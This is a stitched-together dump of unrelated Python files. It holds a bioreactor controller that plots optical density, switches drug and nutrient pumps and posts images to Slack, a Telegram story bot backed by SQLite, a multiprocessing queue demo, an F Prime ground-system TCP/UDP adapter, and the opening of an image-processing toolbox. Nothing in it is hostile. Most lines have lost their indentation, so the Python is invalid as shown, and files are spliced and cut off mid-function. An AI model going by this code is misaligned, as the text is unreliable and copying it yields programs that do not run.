PUplt,PUax = plt.subplots()
PUax.plot(allODs[['average']], label= 'average', color='tab:blue')
PUax.plot(allODs[['min']], label= '_nolegend_', color = 'tab:grey', linestyle= ':')
PUax.set_ylabel(ylabel='Average OD')
lines, labels = PUax.get_legend_handles_labels()
DM = PUax.twinx()
DM.spines['right'].set_position(('axes', 1.0))
pumpa.plot(ax = DM,color=['tab:orange','tab:red','tab:green'],legend=False)
DM.set_yticklabels([])
line, label = DM.get_legend_handles_labels()
lines += line
labels += label
PUax.legend(lines, labels, loc=2)
# PUplt.axhline(y=self.OD_min, color='tab:grey', linestyle=':')
# PUplt.axhline(y=self.OD_thr, color='tab:grey', linestyle=':')
# PUfig = PUplt.get_figure()
PUplt.savefig("%s/%s/%s/PUplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time))
allpumps = None; PUplt.figure = None; PUplt = None; allconcs= None; colors = None; DM = None; pumpa = None
plt.close('all')
with open("%s/%s/%s/PUplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
slack_client.files_upload(
channels = self.chan,
thread_ts = self.threadts,
title = "PUPlot",
file = file_content
)
# THREADS GRAPH
plt.rcParams["figure.dpi"] = 200
ODthr = (allODs[['average']]).plot(label='average', color='tab:blue') #figsize=(10,10) in the plot
ODthr.set_ylabel(ylabel='Average OD')
lines, labels = ODthr.get_legend_handles_labels()
DM = ODthr.twinx()
DM.spines['right'].set_position(('axes', 1.0))
allODs[['threads']].plot(ax = DM, label='threads',color='tab:purple',legend=False)
DM.set_ylabel(ylabel='Active Threads')
line, label = DM.get_legend_handles_labels()
lines += line
labels += label
ODthr.legend(lines, labels, loc=2)
# ODplt = (allODs[['current']]).plot() #figsize=(10,10) in the plot
ODfig = ODthr.get_figure()
ODfig.savefig("%s/%s/%s/ODthreads_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time))
ODfig.clf(); ODthr.figure = None; ODthr = None; ODfig = None; fig = None; allconcs= None; colors = None; DM = None
plt.close('all')
with open("%s/%s/%s/ODthreads_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
slack_client.files_upload(
channels = self.chan,
thread_ts = self.threadts,
title = "ODThreads",
file = file_content
)
# TEMP GRAPH
if self.temp_sensor:
plt.rcParams["figure.dpi"] = 200
ODthr = (allODs[['average']]).plot(label='average', color='tab:blue') #figsize=(10,10) in the plot
ODthr.set_ylabel(ylabel='Average OD')
lines, labels = ODthr.get_legend_handles_labels()
DM = ODthr.twinx()
DM.spines['right'].set_position(('axes', 1.0))
allODs[['temp']].plot(ax = DM, label='threads',color='tab:pink',legend=False)
DM.set_ylabel(ylabel='Incubator Temperature (C)')
line, label = DM.get_legend_handles_labels()
lines += line
labels += label
ODthr.legend(lines, labels, loc=2)
# ODplt = (allODs[['current']]).plot() #figsize=(10,10) in the plot
ODfig = ODthr.get_figure()
ODfig.savefig("%s/%s/%s/ODtemp_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), bbox_inches='tight')
ODfig.clf(); allODs = None; ODthr.figure = None; ODthr = None; ODfig = None; fig = None; allconcs= None; colors = None; DM = None
plt.close('all')
with open("%s/%s/%s/ODtemp_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
slack_client.files_upload(
channels = self.chan,
thread_ts = self.threadts,
title = "ODTemp",
file = file_content
)
if self.firstrec:
self.recmes = slack_client.chat_postMessage(
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
text = 'Elapsed Time: %s ; OD = %.3f' % (self.secondsToText(int(self.elapsed_time.total_seconds())),self.currOD),
thread_ts = self.recgrats
)
with open("%s/%s/%s/ODplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.recod = slack_client.files_upload(
channels = self.chan,
thread_ts = self.recgrats,
title = "ODPlot",
file = file_content
)
with open("%s/%s/%s/ODconc_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.recodc = slack_client.files_upload(
channels = self.chan,
thread_ts = self.recgrats,
title = "ODConc",
file = file_content
)
with open("%s/%s/%s/PUplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.recpu = slack_client.files_upload(
channels = self.chan,
thread_ts = self.recgrats,
title = "PUPlot",
file = file_content
)
with open("/%s/%s/%s/ODthreads_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.rethr = slack_client.files_upload(
channels = self.chan,
thread_ts = self.recgrats,
title = "ODThreads",
file = file_content
)
if self.temp_sensor:
with open("%s/%s/%s/ODtemp_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.retmp = slack_client.files_upload(
channels = self.chan,
thread_ts = self.recgrats,
title = "ODTemp",
file = file_content
)
# print(self.recod['file']['shares']['public'][self.chanid][0]['ts'])
self.firstrec = False
else:
slack_client.chat_delete(
channel = self.chanid,
ts = self.recmes['ts']
)
slack_client.chat_delete(
channel = self.chanid,
ts = self.recod['file']['shares']['public'][self.chanid][0]['ts']
)
slack_client.chat_delete(
channel = self.chanid,
ts = self.recodc['file']['shares']['public'][self.chanid][0]['ts']
)
slack_client.chat_delete(
channel = self.chanid,
ts = self.recpu['file']['shares']['public'][self.chanid][0]['ts']
)
slack_client.chat_delete(
channel = self.chanid,
ts = self.rethr['file']['shares']['public'][self.chanid][0]['ts']
)
if self.temp_sensor:
slack_client.chat_delete(
channel = self.chanid,
ts = self.retmp['file']['shares']['public'][self.chanid][0]['ts']
)
self.recmes = slack_client.chat_postMessage(
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
text = ('Elapsed Time: %s ; OD = %.3f' % (self.secondsToText(int(self.elapsed_time.total_seconds())),self.currOD)),
thread_ts = self.recgrats
)
with open("%s/%s/%s/ODplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.recod = slack_client.files_upload(
channels = self.chan,
thread_ts = self.recgrats,
title = "ODPlot",
file = file_content
)
with open("%s/%s/%s/ODconc_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.recodc = slack_client.files_upload(
channels = self.chan,
thread_ts = self.recgrats,
title = "ODConc",
file = file_content
)
with open("%s/%s/%s/PUplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.recpu = slack_client.files_upload(
channels = self.chan,
thread_ts = self.recgrats,
title = "PUPlot",
file = file_content
)
with open("%s/%s/%s/ODthreads_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.rethr = slack_client.files_upload(
channels = self.chan,
thread_ts = self.recgrats,
title = "ODThreads",
file = file_content
)
if self.temp_sensor:
with open("%s/%s/%s/ODtemp_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.retmp = slack_client.files_upload(
channels = self.chan,
thread_ts = self.recgrats,
title = "ODTemp",
file = file_content
)
except Exception as e:
exc_type, exc_obj, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print(exc_type, fname, exc_tb.tb_lineno)
pass
graph_lock[self.sysnum-1] = False
graph_q.pop(0)
self.thread_locks['graphs'].release()
def dynLimit(self):
self.thread_locks['dynL'].acquire()
self.growthOD.append(self.avOD)
self.growthrate_t.append((self.elapsed_time.total_seconds()/3600))
if len(self.growthOD) == self.avefac:
god_temp = np.diff(self.growthOD)/np.diff(self.growthrate_t)
self.growthrate.append(sum(god_temp)/len(god_temp))
self.growthOD.pop(0)
if len(self.growthrate) < self.avefac:
self.growthrate_t.pop(0)
if len(self.growthrate) == self.avefac:
gr_temp = np.diff(self.growthrate)/np.diff(self.growthrate_t)
self.growthrate2.append(sum(gr_temp)/len(gr_temp))
self.growthrate.pop(0)
self.growthrate_t.pop(0)
if len(self.growthrate2) == self.avefac:
self.instant_gr = sum(god_temp)/len(god_temp)
self.instant_gr2 = sum(gr_temp)/len(gr_temp)
self.growthrate2.pop(0)
if self.instant_gr > self.OD_err and self.instant_gr2 < 0.01:
self.OD_thr_set = True
self.OD_min = self.avOD
self.OD_thr = self.OD_min*1.25
self.thread_locks['dynL'].release()
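    # Reader's note on dynLimit: the smoothed growth rate (instant_gr) and its rate of change
    # (instant_gr2) are estimated from rolling windows of avefac samples; once instant_gr exceeds
    # OD_error while instant_gr2 stays below 0.01, OD_min is pinned to the current average OD and
    # the drug threshold OD_thr is set 25% above it.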
def control_alg(self):
print_buffer = 0
# id = str(self.sysnum)+'CA'
# i2c_q.append(id)
# while i2c_q[0] is not id:
# time.sleep(0.1)
# print_buffer += 1
# if print_buffer % 10 == 0: print ('[%s] {CAlg} Waiting for Locks...' % self.sysstr)
# if i2c_q[0] is id:
# i2c_lock[self.sysnum-1] = True
# time.sleep(0.05)
try:
global slack_client
if self.pipins:
GPIO.setmode(GPIO.BCM)
for pin in self.pin_list:
GPIO.setup(pin, GPIO.OUT)
else:
self.pins = [None]*(max(self.pin_list)+1)
self.mcp = self.gpioe[self.gpio_add.index(self.config[self.sysstr].getint('m_address'))]
for pin in self.pin_list:
self.pins[pin] = self.mcp.get_pin(pin)
self.pins[pin].direction = digitalio.Direction.OUTPUT
self.pins[pin].value = False
if self.avOD > self.OD_min:
self.pump_on(self.P_waste_pins)
time.sleep(self.P_waste_times)
self.pump_off(self.P_waste_pins)
self.waste = 3
self.drug_mass = self.drug_mass - (self.drug_mass/12)
if self.avOD > self.OD_thr and self.avOD > self.last_dilutionOD:
print('[%s] OD Threshold exceeded, pumping cefepime' % self.sysstr)
self.pump_on(self.P_drug_pins)
time.sleep(self.P_drug_times)
self.pump_off(self.P_drug_pins)
self.drug = 2
self.drug_mass = self.drug_mass + 2.5
slack_client.chat_postMessage(
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
thread_ts = self.threadts,
text = "OD = %0.3f, pumping cefepime. Cefepime concentration: %f ug/mL" % (self.avOD, (self.drug_mass)/12)
)
else:
print('[%s] OD below threshold, pumping nutrient' % self.sysstr)
self.pump_on(self.P_nut_pins)
time.sleep(self.P_nut_times)
self.pump_off(self.P_nut_pins)
self.nut = 1
slack_client.chat_postMessage(
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
thread_ts = self.threadts,
text = "OD = %0.3f, pumping nutrient. Cefepime concentration: %f ug/mL" % (self.avOD, (self.drug_mass)/12)
)
else: #report even when pumps aren't activated yet
# self.drug_mass = 0 if self.drug_mass < 0
slack_client.chat_postMessage(
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
thread_ts = self.threadts,
text = "OD = %0.3f, OD below nutrient pump threshold." % (self.avOD)
)
except Exception as e:
print ('[%s] CA - WARNING ADC REQUEST CRASHED' % self.sysstr)
print(e)
pass
self.last_dilutionOD = self.avOD
# i2c_lock[self.sysnum-1] = False
# i2c_q.pop(0)
self.thread_locks['control_alg'].release()
def secondsToText(self,secs):
if secs:
days = secs//86400
hours = (secs - days*86400)//3600
minutes = (secs - days*86400 - hours*3600)//60
seconds = secs - days*86400 - hours*3600 - minutes*60
result = ("{0} day{1}, ".format(days, "s" if days!=1 else "") if days else "") + \
("{0} hour{1}, ".format(hours, "s" if hours!=1 else "") if hours else "") + \
("{0} minute{1}, ".format(minutes, "s" if minutes!=1 else "") if minutes else "") + \
("{0} second{1}, ".format(seconds, "s" if seconds!=1 else "") if seconds else "")
return result[:-2]
else:
return "0 seconds"
def on_timer(self):
global slack_client
self.loops += 1
if self.loops < self.total_time/self.time_between_ODs:
threading.Timer(self.time_between_ODs,self.on_timer).start()
else:
self.now = datetime.now()
self.nows = time.time()
print('[%s] Experiment Complete at %02s:%02s:%02s ' % (self.sysstr, self.now.hour, self.now.minute, self.now.second))
# GPIO.output(P_fan_pins,0)
slack_client.chat_postMessage(
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
thread_ts = self.threadts,
text = "Experiment Complete at %02s:%02s:%02s " % (self.now.hour, self.now.minute, self.now.second)
)
if self.loops > 1:
if not self.thread_locks['threads'].locked():
                self.threads['threads'] = threading.Thread(target=self.thread_split)
                self.threads['threads'].start()
        else:
            self.threads['threads'] = threading.Thread(target=self.thread_split)
            self.threads['threads'].start()
def thread_split(self):
self.thread_locks['threads'].acquire()
self.now = datetime.now()
self.nows = time.time()
#print(self.loops)
self.elapsed_time = self.now - self.start_time
self.active_threads = threading.active_count()
# Count see if the thread is locked for a long time
global i2c_q
if self.loops > 1:
if not self.thread_locks['adc'].locked():
self.thread_locks['adc'].acquire()
i2c_q.append(str(self.sysnum-1)+'OD')
if not self.thread_locks['dynL'].locked():
if (self.loops % int(self.thresh_check*60/self.time_between_ODs)) == 0 and not self.OD_thr_set:
self.threads['dynL'] = threading.Thread(target=self.dynLimit)
self.threads['dynL'].start()
if not self.thread_locks['control_alg'].locked():
if self.loops % (self.loops_between_pumps) == 0:
self.thread_locks['control_alg'].acquire()
i2c_q.append(str(self.sysnum-1)+'CA')
if not self.thread_locks['graphs'].locked():
if (self.loops % int(self.time_between_graphs*60/self.time_between_ODs)) == 0:
self.threads['graphs'] = threading.Thread(target=self.graphOD)
self.threads['graphs'].start()
else:
self.thread_locks['adc'].acquire()
i2c_q.append(str(self.sysnum-1)+'OD')
if (self.loops % int(self.thresh_check*60/self.time_between_ODs)) == 0 and not self.OD_thr_set:
self.threads['dynL'] = threading.Thread(target=self.dynLimit)
self.threads['dynL'].start()
if self.loops % (self.loops_between_pumps) == 0:
self.thread_locks['control_alg'].acquire()
i2c_q.append(str(self.sysnum-1)+'CA')
if (self.loops % int(self.time_between_graphs*60/self.time_between_ODs)) == 0:
self.threads['graphs'] = threading.Thread(target=self.graphOD)
self.threads['graphs'].start()
# save the data to disk if it's time
if (self.loops % int(self.time_between_saves*60/self.time_between_ODs)) == 0:
if self.printing:
print('[%s] Saving to disk' % self.sysstr)
self.threads['save'] = threading.Thread(target=self.savefunc)
self.threads['save'].start()
else:
if self.printing:
print('[%s] Buffering Data' % self.sysstr)
self.threads['buffer'] = threading.Thread(target=self.bufferdata)
self.threads['buffer'].start()
if self.printing:
print ('[%s] Elapsed Time: %s ; Threads = %d ; OD = %.3f' % (self.sysstr, self.secondsToText(int(self.elapsed_time.total_seconds())),self.active_threads,self.currOD))
self.thread_locks['threads'].release()
chips = IC_init()
threading.Thread(target = i2c_controller).start()
threading.Thread(target = temp_runner).start()
eve_starter()
Process(target = live_plotter).start()
# threading.Thread(target = slackresponder).start()
|
jentu.py
|
# -*- encoding: utf-8 -*-
from multiprocessing import Process, Queue
from signal import signal, SIGINT
from random import randint
from settings import *
import telebot
import sqlite3
import json
import time
# import os
#################
## Threading ##
#################
def signal_ctrl(signal, frame):
print("You pressed Ctrl+C!\nShutdown broadcasting...")
exit(0)
def broadcasting(jobs, ready):
#info("Broadcasting")
signal(SIGINT, signal_ctrl)
timer = 0
while True:
timer = time.time()
temp_list = []
while not jobs.empty():
task = jobs.get()
if(timer-task[0] >= 2.0):
if(task[0] < 1.0):
answer_markup = telebot.types.ReplyKeyboardRemove()
else:
answer_markup = None
message = task[3][0]
del task[3][0]
task[0] = time.time()
if task[3]:
temp_list.append(task)
elif task[4]:
answer_markup = telebot.types.ReplyKeyboardMarkup(True, True)
for edge in task[4]:
answer_markup.row(edge[2])
if(message[0] == 't'):
bot.send_message(task[1], message[1], reply_markup=answer_markup, disable_notification=True, parse_mode="Markdown")
elif(message[0] == 'i'):
bot.send_photo(task[1], message[1], reply_markup=answer_markup, disable_notification=True)
ready.put(task[2])
break
else:
temp_list.append(task)
for job in temp_list:
jobs.put(job)
delta = 0.025 - time.time() + timer
if(delta > 0.0):
time.sleep(delta)
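# Reader's note: each queued task has the shape [last_send_time, chat_id, user_id, remaining_messages, edges]
# (see tasks.put(...) in the handlers below); a message is a pair whose first element selects the send type
# ('t' => bot.send_message, 'i' => bot.send_photo) and whose second element is the payload.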
#################
## Main-only ##
#################
if __name__ == '__main__':
# Game Data
story = []
users = {}
tasks = Queue()
user_states = Queue()
# Connect SQLite
dataDB = sqlite3.connect('data.db', check_same_thread=False)
dataEX = dataDB.cursor()
# Loading Story
dataEX.execute("SELECT * FROM answer ORDER BY id")
dataDB.commit()
for row in dataEX:
story.append(json.loads(row[1]))
#print(story[0][1][1][2])
# Loading Users
dataEX.execute("SELECT * FROM users WHERE id != 0")
dataDB.commit()
print("USERS:")
for row in dataEX:
users[row[0]] = [row[1], row[2], True]
print("-> user", row[0], "-----", users[row[0]])
# SQLite Functions
def new_user(message):
dataEX.execute("""
INSERT INTO users (id, save, archivement)
SELECT {0}, {1}, '{2}' FROM users
WHERE NOT EXISTS (SELECT 1 FROM users WHERE id = {0} LIMIT 1)
LIMIT 1""".format(str(message.from_user.id), '0', '[]'))
dataDB.commit()
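        # Note: the INSERT ... SELECT ... WHERE NOT EXISTS pattern above only adds a row when the id is
        # absent, and it yields a row to insert only if the users table already has at least one row
        # (apparently the id = 0 sentinel excluded when users are loaded above).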
users[message.from_user.id] = [0,'[]',True]
#users[row[0]] = [row[1], row[2]]
#usersEX.execute('CREATE TABLE users (id INTEGER NOT NULL PRIMARY KEY, save INTEGER NOT NULL, archivement TEXT)')
# Debug logging
def log(info, message):
print("\n______________________________________LOG______________________________________")
print("From: {0} {1}; Info: {2}".format(message.from_user.first_name, message.from_user.last_name, info))
print("Text: " + message.text)
print("_______________________________________________________________________________")
#################
## TeleBot ##
#################
# Initialize TeleBot
bot = telebot.TeleBot(drink(vodka))
# Start session
@bot.message_handler(commands=['start'])
def send_welcome(message):
new_user(message)
users[message.from_user.id][2] = False
tasks.put([0.0, message.chat.id, message.from_user.id, story[0][2], story[0][1]])
log("START", message)
# Stop
@bot.message_handler(commands=['stop'])
def send_wtf(message):
stop_markup = telebot.types.ReplyKeyboardRemove()
bot.reply_to(message, "WTF?! NO!", reply_markup=stop_markup)
log("STOP", message)
# Parsing Text
@bot.message_handler(content_types=['text'])
def send_answer(message):
if(message.text == "kekos"):
bot.reply_to(message, "privetos")
if(message.from_user.id in users):
bot.send_message(message.chat.id, "Oh, I know who are you!")
else:
user_id = message.from_user.id
answer_id = message.chat.id
okay = False
if(not users[user_id][2]):
while not user_states.empty():
user_id = user_states.get()
users[user_id][2] = True
if(user_id == message.from_user.id):
okay = True
break
else:
okay = True
if(okay):
wrong = True
for edge in story[users[user_id][0]][1]:
if(message.text == edge[2]):
users[user_id][0] = edge[0]
users[user_id][2] = False
wrong = False
tasks.put([0.0, answer_id, user_id, story[edge[0]][2], story[edge[0]][1]])
break
if(wrong):
                    bot.send_message(answer_id, "Hmm... something went wrong!")
log("TEXT", message)
################
## MAIN ##
################
if __name__ == '__main__':
broad = Process(target=broadcasting, args=(tasks, user_states))
broad.start()
print("JentuBot started! <-> ['Ctrl+C' to shutdown]")
bot.polling(none_stop=True, interval=0)
# def info(title):
# print("!#", title, "...")
# print("... working on process:", os.getpid(), "<=> Parent:", os.getppid())
|
process_queue.py
|
#!/usr/bin/python3
###################################
# File Name : process_queue.py
###################################
import time
import multiprocessing
def set_data(q):
p = multiprocessing.current_process()
msg = "Hello World"
q.put(msg)
print ("[%s] set queue data : %s" % (p.name, msg))
def get_data(q):
time.sleep(1)
p = multiprocessing.current_process()
print ("[%s] get queue data : %s" % (p.name, q.get()))
def main():
queue = multiprocessing.Queue()
p1 = multiprocessing.Process(name="set_data", target=set_data, args=(queue,))
p1.start()
p2 = multiprocessing.Process(name="get_data", target=get_data, args=(queue,))
p2.start()
p1.join()
p2.join()
if __name__ == "__main__":
main()
|
ip.py
|
import time
import logging
import socket
import threading
import fprime_gds.common.adapters.base
import fprime_gds.common.logger
LOGGER = logging.getLogger("ip_adapter")
class IpAdapter(fprime_gds.common.adapters.base.BaseAdapter):
"""
Adapts IP traffic for use with the GDS ground system. This serves two different "servers" both on the same address
and port, but one uses TCP and the other uses UDP. Writes go to the TCP connection, and reads request data from
both. This data is concatenated and returned up the stack for processing.
"""
KEEPALIVE_INTERVAL = 0.500 # Interval to send a KEEPALIVE packet. None will turn off KEEPALIVE.
KEEPALIVE_DATA = b"sitting well" # Data to send out as part of the KEEPALIVE packet. Should not be null nor empty.
def __init__(self, sender, address, port):
"""
Initialize this adapter by creating a handler for UDP and TCP. A thread for the KEEPALIVE application packets
        will be created if the interval is not None.
"""
super(IpAdapter, self).__init__(sender)
self.keepalive = None
self.running = True
self.tcp = TcpHandler(address, port)
self.udp = UdpHandler(address, port)
# Keep alive thread
try:
if IpAdapter.KEEPALIVE_INTERVAL is not None:
                self.keepalive = threading.Thread(target=self.run, args=[float(self.KEEPALIVE_INTERVAL)])
                self.keepalive.start()
except (ValueError, TypeError) as exc:
LOGGER.error("Failed to start keep-alive thread. {}: {}".format(type(exc).__name__, str(exc)))
def open(self):
"""
Open up the interface to the stored Address and Port. This will create a TCP and UDP socket. The TCP socket will
be bound to the address, and listened to for incoming connects.
"""
self.tcp.open()
self.udp.open()
def close(self):
"""
Close the TCP and UDP sockets.
"""
self.tcp.close()
self.udp.close()
def write(self, frame):
"""
        Send a given framed bit of data out over the TCP connection. It will attempt to reconnect if there
        was a problem previously. This function will return True on success, or False on error.
        :param frame: framed data packet to send out
        :return: True when data was sent through the TCP socket, False otherwise.
"""
return self.tcp.write(frame)
def read(self, _):
"""
Read up to a given count in bytes from the TCP adapter. This may return less than the full requested size but
is expected to return some data.
:param _: upper bound of data requested, unused with IP connections
:return: data successfully read
"""
return self.tcp.read() + self.udp.read()
def run(self, interval):
"""
        Run the keepalive loop: periodically write KEEPALIVE_DATA out the adapter every `interval` seconds
        until the adapter is stopped.
"""
while self.running:
self.write(IpAdapter.KEEPALIVE_DATA)
time.sleep(interval)
@classmethod
def get_arguments(cls):
"""
Returns a dictionary of flag to argparse-argument dictionaries for use with argparse to setup arguments.
:return: dictionary of flag to argparse arguments for use with argparse
"""
return {
("-a", "--address"):{
"dest":"address",
"type":str,
"default":"0.0.0.0",
"help":"Address of the IP adapter server. Default: %(default)s"
},
("-p", "--port"): {
"dest":"port",
"type":int,
"default": 50000,
"help":"Port of the IP adapter server. Default: %(default)s"
}
}
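# Sketch (not part of fprime_gds): shows how the flag-to-kwargs mapping returned by
# IpAdapter.get_arguments() could be wired into argparse. The helper name and the sample argv
# values below are assumptions for illustration only.
def _example_build_ip_parser(argv=("--address", "127.0.0.1", "--port", "50000")):
    import argparse
    parser = argparse.ArgumentParser(description="IP adapter options (illustrative)")
    for flags, kwargs in IpAdapter.get_arguments().items():
        # each key is a tuple of command-line flags, each value the argparse keyword arguments
        parser.add_argument(*flags, **kwargs)
    return parser.parse_args(list(argv))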
class IpHandler(object):
"""
Base handler for IP types. This will provide the basic methods, and synchronization for reading/writing to multiple
child implementations, namely: UDP and TCP. These child objects can then be instantiated individually.
"""
IP_SOCKET_TIMEOUT = 0.001 # Timeout applied to the socket
ERROR_RETRY_INTERVAL = 1 # Seconds between a non-timeout error and a socket reconnection
MAX_CLIENT_BACKLOG = 1 # One client backlog, allowing for reconnects
# Connection states, it will go between these states
CONNECTING = "CONNECTING"
CONNECTED = "CONNECTED"
CLOSED = "CLOSED"
def __init__(self, address, port, type, server=True, logger=logging.getLogger("ip_handler")):
"""
Initialize this handler. This will set the variables, and start up the internal receive thread.
:param address: address of the handler
:param port: port of the handler
:param type: type of this adapter. socket.SOCK_STREAM or socket.SOCK_DGRAM
"""
self.type = type
self.address = address
self.next_connect = 0
self.port = port
self.socket = None
self.server = server
self.lock = threading.Lock()
self.connected = IpHandler.CLOSED
self.logger = logger
def open(self):
"""
Open up this IP type adapter. Returning if already connected.
"""
if self.CONNECTED == self.connected:
return True
# If a server, just continually try and reconnect. Otherwise, just try once.
while True:
try:
with self.lock:
# Prevent reconnects when the socket is connected. Socket should be closed on all errors
if self.connected == IpHandler.CLOSED and self.next_connect < time.time():
self.connected = IpHandler.CONNECTING
self.socket = socket.socket(socket.AF_INET, self.type)
if self.server:
self.socket.bind((self.address, self.port))
else:
self.socket.connect((self.address, self.port))
self.socket.settimeout(IpHandler.IP_SOCKET_TIMEOUT)
self.open_impl()
self.connected = IpHandler.CONNECTED
self.logger.info("{} connected to {}:{}"
.format("Server" if self.server else "Client", self.address, self.port))
# All errors (timeout included) we should close down the socket, which sets self.connected
except socket.error as exc:
if type(exc) != socket.timeout:
self.logger.warning("Failed to open socket at {}:{}, retrying: {}: {}"
.format(self.address, self.port, type(exc).__name__, str(exc)))
self.next_connect = time.time() + IpHandler.ERROR_RETRY_INTERVAL
self.close()
# Check ending condition of loop
with self.lock:
if not self.server or self.CONNECTED == self.connected:
break
# Connection established, run post open
if self.CONNECTED == self.connected:
self.post_open()
return self.connected == self.CONNECTED
def close(self):
"""
Close this specific IP handler. This involves setting connected to False, and closing non-null sockets.
"""
with self.lock:
try:
self.close_impl()
if self.socket is not None:
self.socket.close()
self.socket = None
finally:
self.connected = IpHandler.CLOSED
def post_open(self):
"""Post opening step"""
pass
def read(self):
"""
Reads a single message after ensuring that the socket is fully open. On a non-timeout error, close the socket in
preparation for a reconnect. This internally will call the child's read_impl
:return: data read from TCP server or b"" when nothing is available
"""
# Open if not already open, on failure return b""
if self.open():
# This will block waiting for data
try:
with self.lock:
return self.read_impl()
except socket.timeout:
pass
except socket.error as exc:
self.close()
self.logger.warning("Read failure attempting reconnection. {}: ".format(type(exc).__name__, str(exc)))
self.open()
return b""
def write(self, message):
"""
Writes a single message after ensuring that the socket is fully open. On any error, close the socket in
preparation for a reconnect. This internally will call the child's write_impl
:param message: message to send
:return: True if all data was written, False otherwise
"""
        # Open if not already open, on failure return False
        if self.open():
            # This will block while sending the data
try:
with self.lock:
self.write_impl(message)
return True
except socket.error as exc:
self.close()
self.logger.warning("Write failure, reconnecting. {}: ".format(type(exc).__name__, str(exc)))
self.open()
return False
class TcpHandler(IpHandler):
"""
An IpAdapter that allows for interfacing with TCP socket.
"""
def __init__(self, address, port, server=True, logger=logging.getLogger("tcp_handler")):
"""
Init the TCP adapter with port and address
:param address: address of TCP
:param port: port of TCP
"""
super(TcpHandler, self).__init__(address, port, socket.SOCK_STREAM, server, logger)
self.client = None
self.client_address = None
def open_impl(self):
"""
        Open up this particular adapter. When acting as a server this accepts a single client connection; otherwise the base socket itself is used as the client.
"""
# When a server, must accept and spawn new socket
if self.server:
self.socket.listen(IpHandler.MAX_CLIENT_BACKLOG)
(self.client, self.client_address) = self.socket.accept()
self.client.settimeout(IpHandler.IP_SOCKET_TIMEOUT)
# When a client, use normal socket
else:
self.client = self.socket
def close_impl(self):
"""
Close the TCP socket that was spawned as appropriate.
"""
if self.client is not None:
self.client.close()
self.client = None
self.client_address = None
def read_impl(self):
"""
Specific read implementation for the TCP handler. This involves reading from the spawned client socket, not the
primary socket.
"""
data = self.client.recv(IpAdapter.MAXIMUM_DATA_SIZE)
return data
def write_impl(self, message):
"""
Send is implemented with TCP. It will send it to the connected client.
:param message:
:return:
"""
self.client.sendall(message)
class UdpHandler(IpHandler):
"""
Handler for UDP traffic. This will work in unison with the TCP adapter.
"""
def __init__(self, address, port, server=True, logger=logging.getLogger("udp_handler")):
"""
Init UDP with address and port
:param address: address of UDP
:param port: port of UDP
"""
super(UdpHandler, self).__init__(address, port, socket.SOCK_DGRAM, server, logger)
def open_impl(self):
"""No extra steps required"""
pass
def close_impl(self):
"""No extra steps required"""
pass
def read_impl(self):
"""
Receive from the UDP handler. This involves receiving from an unconnected socket.
"""
(data, address) = self.socket.recvfrom(IpAdapter.MAXIMUM_DATA_SIZE)
return data
def write_impl(self, message):
"""
Write not implemented with UDP
"""
raise NotImplementedError("UDP Handler cannot send data.")
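# A minimal usage sketch of the handlers above, assuming a peer is already listening on
# the chosen host/port; the host, port, and payload values below are illustrative only.
def _example_tcp_client_roundtrip(host="127.0.0.1", port=50000):
    """Open a TCP client handler, send one message, and read back one reply."""
    handler = TcpHandler(host, port, server=False)
    if not handler.open():
        return None
    try:
        handler.write(b"ping\n")
        # read() returns b"" if nothing arrives within IP_SOCKET_TIMEOUT
        return handler.read()
    finally:
        handler.close()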
|
vc_toolbox.py
|
import os
import numpy as np
from io import BytesIO
import PIL.Image
from IPython import display
from scipy.spatial.distance import cdist
import scipy.ndimage
import lap # pip install lap
import umap
from math import floor, sqrt, ceil
import copy
import torch as t
import torchvision as tv
import torch.nn as nn
from tqdm import tqdm
import threading
from queue import Queue
def load_img(file):
return PIL.Image.open(file).convert('RGB')
def from_device(tensor):
return tensor.detach().cpu().numpy()
# Show an image within a Jupyter environment
# Can do PyTorch tensors, NumPy arrays, file paths, and PIL images
def show_img(img, fmt='jpeg', normalize=False):
if type(img) is np.ndarray:
img = PIL.Image.fromarray(img)
elif type(img) is t.Tensor:
img = _deprocess(img, normalize)
elif type(img) is str or type(img) is np.str_:
img = PIL.Image.open(img)
out = BytesIO()
img.save(out, fmt)
display.display(display.Image(data=out.getvalue()))
# Save an image
# Can do PyTorch tensors, NumPy arrays, file paths, and PIL images
def save_img(img, filename, normalize=False):
if type(img) is np.ndarray:
img = PIL.Image.fromarray(img)
elif type(img) is t.Tensor:
img = _deprocess(img, normalize)
elif type(img) is str or type(img) is np.str_:
img = PIL.Image.open(img)
img.save(filename)
# Reverse of preprocess, PyTorch tensor to PIL image
def _deprocess(tensor, normalize):
# Clone tensor first, otherwise we are NOT making a copy by using .cpu()!
img = t.clone(tensor)
img = img.cpu().data.numpy().squeeze() # Get rid of batch dimension
img = img.transpose((1, 2, 0)) # Channels first to channels last
if normalize:
mean = np.array([0.485, 0.456, 0.406])
std = np.array([0.229, 0.224, 0.225])
img = std * img + mean
# 0./1. range to 0./255. range
img *= 255
img = img.astype(np.uint8)
